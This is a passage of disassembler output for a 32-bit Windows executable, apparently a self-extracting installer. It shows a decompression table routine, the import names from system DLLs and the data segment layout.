var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
push 8
pop ecx
xor eax, eax
lea edi, [ebp+var_2A]
push 8
rep stosd
mov ecx, [ebp+arg_4]
pop edx
loc_1006C8C: ; CODE XREF: sub_1006C73+25�j
movzx eax, byte ptr [ecx]
lea eax, [ebp+eax*2+var_2C]
inc word ptr [eax]
inc ecx
dec edx
jnz short loc_1006C8C
push 0Fh
pop ecx
xor ebx, ebx
push 10h
mov [ebp+var_4E], bx
xor eax, eax
pop edx
loc_1006CA8: ; CODE XREF: sub_1006C73+4B�j
mov si, [ebp+eax+var_2A]
shl si, cl
add si, [ebp+eax+var_4E]
dec ecx
mov [ebp+eax+var_4C], si
inc eax
inc eax
dec edx
jnz short loc_1006CA8
xor eax, eax
cmp [ebp+var_2E], bx
jnz loc_1006D7B
push 6
pop ecx
push 7
pop edx
loc_1006CD2: ; CODE XREF: sub_1006C73+73�j
shr [ebp+eax+var_4E], 9
xor esi, esi
inc esi
shl esi, cl
dec ecx
inc eax
inc eax
dec edx
mov [ebp+eax+var_2C], si
jnz short loc_1006CD2
push 8
pop ecx
push 9
lea eax, [ebp+var_1C]
pop edx
loc_1006CF1: ; CODE XREF: sub_1006C73+8A�j
xor esi, esi
inc esi
shl esi, cl
dec ecx
mov [eax], si
inc eax
inc eax
dec edx
jnz short loc_1006CF1
mov edi, [ebp+arg_8]
push 20h
pop ecx
xor eax, eax
rep stosd
mov [ebp+var_1], bl
loc_1006D0C: ; CODE XREF: sub_1006C73+103�j
movzx eax, [ebp+var_1]
mov ecx, [ebp+arg_4]
mov al, [eax+ecx]
test al, al
jz short loc_1006D6F
movzx eax, al
shl eax, 1
lea ecx, [ebp+eax+var_50]
mov dx, [ecx]
xor esi, esi
mov si, [ebp+eax+var_2C]
add si, dx
cmp si, 80h
mov [ebp+var_8], ecx
ja short loc_1006D82
cmp dx, si
jnb short loc_1006D6C
mov eax, esi
sub eax, edx
movzx ecx, ax
mov al, [ebp+var_1]
mov bl, al
mov bh, bl
movzx edi, dx
add edi, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov ecx, [ebp+var_8]
loc_1006D6C: ; CODE XREF: sub_1006C73+CA�j
mov [ecx], si
loc_1006D6F: ; CODE XREF: sub_1006C73+A5�j
inc [ebp+var_1]
cmp [ebp+var_1], 8
jb short loc_1006D0C
xor eax, eax
inc eax
loc_1006D7B: ; CODE XREF: sub_1006C73+53�j
; sub_1006C73+111�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_1006D82: ; CODE XREF: sub_1006C73+C5�j
xor eax, eax
jmp short loc_1006D7B
sub_1006C73 endp
; ---------------------------------------------------------------------------
align 4
dd 6F60h, 2 dup(0)
dd 6FBEh, 2138h, 6E28h, 2 dup(0)
dd 70DCh, 2000h, 6E64h, 2 dup(0)
dd 748Eh, 203Ch, 6F3Ch, 2 dup(0)
dd 7516h, 2114h, 6F78h, 2 dup(0)
dd 7570h, 2150h, 6E5Ch, 2 dup(0)
dd 757Ah, 2034h, 6F30h, 2 dup(0)
dd 75B6h, 2108h, 5 dup(0)
dd 700Ah, 70BCh, 70ACh, 7096h, 707Ah, 7062h, 6FCAh, 6FE4h
dd 6FF4h, 701Eh, 703Ah, 7050h, 0
dd 80000011h, 0
dd 7444h, 7454h, 729Ah, 70EAh, 70F6h, 7108h, 7114h, 7122h
dd 7134h, 714Ch, 7160h, 7170h, 717Eh, 718Ch, 71A4h, 71B8h
dd 71C4h, 71CCh, 71E6h, 7200h, 7216h, 7222h, 7230h, 723Ch
dd 724Ah, 7262h, 7270h, 7284h, 7434h, 72AAh, 72BCh, 72CCh
dd 72E2h, 72F0h, 7304h, 731Ah, 732Ch, 7342h, 7356h, 736Eh
dd 737Eh, 7392h, 73A4h, 73B4h, 73CCh, 73DAh, 73F4h, 740Ch
dd 7422h, 7466h, 0
dd 75A0h, 7588h, 0
dd 74D0h, 749Ch, 74AAh, 74B6h, 74C2h, 74E2h, 74F2h, 7508h
dd 0
dd 6F8Ch, 6F96h, 6FA0h, 6FAAh, 6FB4h, 0
dd 755Ch, 7546h, 752Ch, 7522h, 0
dd 747302FDh, 72686372h, 2F80000h, 69727073h, 66746Eh
dd 7473030Bh, 72747372h, 1F90000h, 7274735Fh, 72776Ch
dd 74730307h, 70636E72h, 736D0079h, 74726376h, 6C6C642Eh
dd 1320000h
aInitiatesystem db 'InitiateSystemShutdownA',0
db 0F4h ; ô
align 2
aGetlengthsid db 'GetLengthSid',0
align 4
db 17h
db 1, 47h, 65h
aTtokeninformat db 'tTokenInformation',0
dw 1A8h
aOpenprocesstok db 'OpenProcessToken',0
align 2
dw 1Dh
aAllocateandini db 'AllocateAndInitializeSid',0
align 2
aQ db 'Ÿ',0
aCryptreleaseco db 'CryptReleaseContext',0
db '•',0
aCryptgenrandom db 'CryptGenRandom',0
align 2
aD db '„',0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
dw 22Eh
aSetsecuritydes db 'SetSecurityDescriptorDacl',0
dw 10h
aAddaccessallow db 'AddAccessAllowedAce',0
db 2Fh ; /
db 1, 49h, 6Eh
aItializeacl db 'itializeAcl',0
db 30h ; 0
db 1, 49h, 6Eh
aItializesecuri db 'itializeSecurityDescriptor',0
align 4
aAdvapi32_dll db 'ADVAPI32.dll',0
db 0, 90h, 2
aReadfile db 'ReadFile',0
align 2
dw 2F1h
aSetfilepointer db 'SetFilePointer',0
align 4
db 0F5h ; õ
db 1, 48h, 65h
aApfree db 'apFree',0
align 4
db ',',0
aClosehandle db 'CloseHandle',0
aR db 'à',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db 9Fh ; Ÿ
db 2, 52h, 65h
aMovedirectorya db 'moveDirectoryA',0
align 10h
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 10h
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 24Bh
aMovefileexa db 'MoveFileExA',0
db '‹',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 31h ; 1
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 0ECh ; ì
db 2, 53h, 65h
aTevent db 'tEvent',0
align 4
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0E9h ; é
db 2, 53h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 142h
aGetenvironment db 'GetEnvironmentVariableA',0
db 69h ; i
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 1EFh
aHeapalloc db 'HeapAlloc',0
aJ db 'J',0
aCreatefilea db 'CreateFileA',0
dd 72570376h, 46657469h, 656C69h, 784500ABh, 72507469h
dd 7365636Fh, 760073h
aDeletecritical db 'DeleteCriticalSection',0
db 'å',0
aFreelibrary db 'FreeLibrary',0
db 'Û',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 0A6h ; ¦
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 1C8h
aGetversionexa db 'GetVersionExA',0
dw 189h
aGetprocaddress db 'GetProcAddress',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 65h ; e
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
dw 258h
aOpeneventa db 'OpenEventA',0
align 10h
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 48h ; H
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 0FDh
aGetcommandline db 'GetCommandLineA',0
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aB db 'B',0
aCreatedirector db 'CreateDirectoryA',0
align 2
dw 32Eh
aSystemtimetofi db 'SystemTimeToFileTime',0
align 2
dw 1AAh
aGetsystemtime db 'GetSystemTime',0
dw 139h
aGetdiskfreespa db 'GetDiskFreeSpaceA',0
dw 27Ah
aQuerydosdevice db 'QueryDosDeviceA',0
db 3Dh ; =
db 1, 47h, 65h
aTdrivetypea db 'tDriveTypeA',0
db 2Dh ; -
db 1, 47h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
align 4
dd 655302F5h, 6C694674h, 6D695465h, 2360065h
aLocalfiletimet db 'LocalFileTimeToFileTime',0
aD_0 db '„',0
aDosdatetimetof db 'DosDateTimeToFileTime',0
db 44h ; D
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 4
aE db 'e',0
aCreatethread db 'CreateThread',0
align 4
aF db 'F',0
aCreateeventa db 'CreateEventA',0
align 4
dd 6547018Bh, 6F725074h, 73736563h, 70616548h, 2030000h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aKernel32_dll db 'KERNEL32.dll',0
align 4
dd 6F4C01C8h, 74536461h, 676E6972h, 0C60041h, 44646E45h
dd 6F6C6169h, 2660067h, 50746553h, 6E657261h, 1DC0074h
dd 7373654Dh, 42656761h, 41786Fh, 6944009Eh, 676F6C61h
dd 50786F42h, 6D617261h, 23B0041h, 646E6553h, 7373654Dh
dd 41656761h, 2360000h
aSenddlgitemmes db 'SendDlgItemMessageA',0
db 92h ; ’
db 2, 53h, 68h
aOwwindow db 'owWindow',0
align 2
aUser32_dll db 'USER32.dll',0
align 2
aB_0 db 'b',0
aNtclose db 'NtClose',0
aT db 'T',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
db 'Ç',0
aNtopenprocesst db 'NtOpenProcessToken',0
align 4
db 47h ; G
db 1, 4Eh, 74h
aShutdownsystem db 'ShutdownSystem',0
align 10h
aNtdll_dll db 'ntdll.dll',0
aComctl32_dll db 'COMCTL32.dll',0
align 4
aJ_0 db 'j',0
aShgetpathfromi db 'SHGetPathFromIDListA',0
align 10h
a@ db '@',0
aShbrowseforfol db 'SHBrowseForFolderA',0
align 2
aShell32_dll db 'SHELL32.dll',0
align 40h
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 00010C28 ( 68648.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00005A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 1008000h
off_1008000 dd offset off_1008000 ; DATA XREF: sub_10025BE:loc_10025E5�r
; sub_10025BE+33�o ...
align 8
off_1008008 dd offset off_1008008 ; DATA XREF: sub_10025BE+6D�r
; sub_10025BE+79�o ...
align 10h
; DWORD dword_1008010
dword_1008010 dd 13315Ch ; sub_100369E+392�r ...
; LONG lDistanceToMove
lDistanceToMove dd 80006600h ; DATA XREF: sub_10024E0+B�r
; sub_10024E0+24�r ...
dword_1008018 dd 0CAB00EEEh ; HANDLE hFile
hFile dd 0FFFFFFFFh ; DATA XREF: sub_10023BC+4�r
; sub_10023BC+2C�r ...
; HINSTANCE hInstance
hInstance dd 0 ; DATA XREF: sub_1002556+19�r
; sub_1002CB9+49�r ...
dword_1008024 dd 0 ; sub_1002CB9+8F�w ...
; HANDLE hObject
hObject dd 0 ; DATA XREF: sub_10024C1+C�r
; sub_10024C1+15�w ...
dword_100802C dd 0 ; sub_1003272:loc_10034BE�w ...
dword_1008030 dd 0 ; sub_1003272+29B�w ...
; LPARAM lParam
lParam dd 0 ; DATA XREF: sub_1003272+46�w
; sub_1003272:loc_100332E�r ...
dword_1008038 dd 0 ; sub_1003272+2C5�w ...
align 10h
dword_1008040 dd 0 ; sub_10027DE+1A�r
dd 6Fh dup(0)
dd 90h dup(?)
dword_1008440 dd ? ; sub_10023BC+41�r ...
dword_1008444 dd ? ; sub_1002BF1+7D�w
dword_1008448 dd ? ; sub_1002BF1+87�w ...
; int dword_100844C
dword_100844C dd ? dword_1008450 dd 7Fh dup(?) db 3 dup(?)
byte_100864F db ? ; DATA XREF: sub_10023BC+67�w
dd 4 dup(?)
; char FileName[]
FileName dd ? ; DATA XREF: sub_1003272+1D9�o
; sub_1003272+1EF�r ...
dd 40h dup(?)
; HWND hWnd
hWnd dd ? ; DATA XREF: sub_10026BA+22�w
; sub_10026BA:loc_100272D�w ...
dword_1008768 dd ? ; sub_1003272+2E4�w ...
; LPARAM dword_100876C
dword_100876C dd ? ; sub_1003AE1+AE�w ...
; HWND hWndNewParent
hWndNewParent dd ? ; DATA XREF: sub_10026BA+37�w
; start_0+EA�r
; HANDLE hEvent
hEvent dd ? ; DATA XREF: sub_10026BA:loc_10026FC�r
; start_0+82�w ...
align 10h
; char NumberOfBytesRead[]
NumberOfBytesRead dd ? ; DATA XREF: sub_1003272+C�o
; sub_1003272+29�r ...
dd 40h dup(?)
; HANDLE hProcess
hProcess dd ? ; DATA XREF: sub_10026BA+5B�r
; start_0+43D�w ...
dd 6 dup(?)
; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10025BE+4�o
; sub_10025BE:loc_10026AA�o ...
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_10024AE+6�r
; sub_100280D+ED�r ...
dword_10088BC dd ? ; start_0:loc_1003FF5�r ...
; char Buffer[]
Buffer dd ? ; DATA XREF: sub_10025BE:loc_1002687�o
; sub_1002746+5�o ...
dd 47h dup(?)
; char Caption[]
Caption dd ? ; DATA XREF: sub_1003272+C8�w
; sub_1003272+108�o ...
dd 47h dup(?)
; char Value[]
Value db 120h dup(?) ; DATA XREF: sub_1002BF1+1B�o
; start_0+361�o
; PSID pSid
pSid dd ? ; DATA XREF: sub_1002FAA+70�o
; sub_1002FAA:loc_1003031�r ...
dd 3FFFh dup(?)
dword_1018C20 dd ? ; sub_1003272+2B8�w ...
; LPCSTR lpCurrentDirectory
lpCurrentDirectory dd ? ; DATA XREF: sub_1003AE1+FB�w
; start_0+3FA�r
align 200h
_data ends
end start